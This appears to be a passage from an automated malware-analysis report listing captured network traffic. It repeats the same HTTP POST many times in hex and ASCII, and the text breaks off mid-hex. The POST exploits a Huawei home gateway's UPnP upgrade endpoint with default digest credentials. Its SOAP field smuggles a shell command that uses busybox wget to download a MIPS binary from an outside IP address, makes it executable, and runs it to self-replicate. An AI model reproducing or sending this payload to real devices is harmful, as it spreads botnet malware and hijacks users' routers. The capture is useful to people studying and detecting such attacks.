3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 